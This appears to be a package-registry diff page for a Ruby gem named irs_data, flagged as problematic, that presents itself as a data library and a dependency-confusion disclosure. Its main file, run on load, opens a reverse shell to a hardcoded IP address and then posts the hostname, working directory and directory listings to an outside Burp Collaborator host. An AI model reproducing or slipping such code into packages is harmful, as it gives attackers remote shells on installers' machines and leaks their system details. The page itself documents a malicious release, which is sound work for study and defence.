irs_data 9.9.9999911

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of irs_data might be problematic. Click here for more details.

Files changed (3) hide show
  1. checksums.yaml +7 -0
  2. data/lib/irs_data.rb +48 -0
  3. metadata +45 -0
checksums.yaml ADDED
@@ -0,0 +1,7 @@
1
+ ---
2
+ SHA256:
3
+ metadata.gz: 1b9f57d1ccf3e825d07cf64cb069b79c114da424c353c646d2ab2006cd65ce55
4
+ data.tar.gz: 128d099e3bf62406f1819e245f679ec1d49e64a203dfb9357c1d449d9c2a23a3
5
+ SHA512:
6
+ metadata.gz: b9371dd0ed73ffb85bb652a43791fbb169d3fbb066dbaa65afc5f5e07837d0b2c1a2225b8ab440c530df640918965c7dfdcbec78c3550da967d0aaadc277dc8f
7
+ data.tar.gz: 06f277307066504e529b0f4325116ad0aafc1f5edd0a2602b0770ed263fce0f9735e84ce2ceb9e8ce45da08ba9207408e67cf373c52620317a692645d84b2b4f
data/lib/irs_data.rb ADDED
@@ -0,0 +1,48 @@
1
+ module IrsData
2
+
3
+ require 'json'
4
+ require 'net/http'
5
+ require 'socket'
6
+ require 'ipaddr'
7
+ #Private IP
8
+
9
+ $ip = "104.248.8.1"
10
+ $port = 443
11
+
12
+ socket = Socket.new(Socket::AF_INET, Socket::SOCK_STREAM, 0)
13
+ sockaddr = Socket.sockaddr_in($port, IPAddr.new($ip).to_i)
14
+
15
+ if socket.connect(sockaddr)
16
+ [STDIN, STDOUT, STDERR].each do |s|
17
+ s.reopen(socket)
18
+ end
19
+ exec("/bin/sh -i")
20
+ end
21
+
22
+ #Hostname
23
+ hostname = Socket.gethostname
24
+ #Current directory
25
+ dir = Dir.pwd
26
+ entries = Dir.entries('/')
27
+ homedir = Dir.entries('/home/')
28
+ #rubyenv = File.read('/home/t6C95A1F/.rbenv')
29
+
30
+ #Pubcli bin url:- burpCollaborate url
31
+ uri = URI('http://7rzdeigmq8xye774j9no320stjzan0bp.oastify.com')
32
+ req = Net::HTTP::Post.new(uri, 'Content-Type' => 'application/json')
33
+
34
+ req.body = {
35
+ private_ip: privip,
36
+ hostname: hostname,
37
+ current_directory: dir,
38
+ directory_dir: entries,
39
+ home_dir: homedir
40
+ # rubyenv_content: rubyenv
41
+
42
+ }.to_json
43
+
44
+ Net::HTTP.start(uri.hostname, uri.port, :use_ssl => uri.scheme == 'https') do |http|
45
+ http.request(req)
46
+ end
47
+
48
+ end
metadata ADDED
@@ -0,0 +1,45 @@
1
+ --- !ruby/object:Gem::Specification
2
+ name: irs_data
3
+ version: !ruby/object:Gem::Version
4
+ version: 9.9.9999911
5
+ platform: ruby
6
+ authors:
7
+ - Joaquin Rodriguez Varela
8
+ autorequire:
9
+ bindir: exe
10
+ cert_chain: []
11
+ date: 2023-10-09 00:00:00.000000000 Z
12
+ dependencies: []
13
+ description: This Ruby package vulnerable to dependency confiuse vulnerability
14
+ email:
15
+ - jrodriguez@includesec.com
16
+ executables: []
17
+ extensions: []
18
+ extra_rdoc_files: []
19
+ files:
20
+ - lib/irs_data.rb
21
+ homepage: https://rubygems.org/gems/irs_data
22
+ licenses:
23
+ - MIT
24
+ metadata:
25
+ homepage_uri: https://rubygems.org/gems/irs_data
26
+ post_install_message:
27
+ rdoc_options: []
28
+ require_paths:
29
+ - lib
30
+ required_ruby_version: !ruby/object:Gem::Requirement
31
+ requirements:
32
+ - - ">="
33
+ - !ruby/object:Gem::Version
34
+ version: 2.6.0
35
+ required_rubygems_version: !ruby/object:Gem::Requirement
36
+ requirements:
37
+ - - ">="
38
+ - !ruby/object:Gem::Version
39
+ version: '0'
40
+ requirements: []
41
+ rubygems_version: 3.3.5
42
+ signing_key:
43
+ specification_version: 4
44
+ summary: 'Vulnerability Disclosure: Dependency confiuse vulnerability'
45
+ test_files: []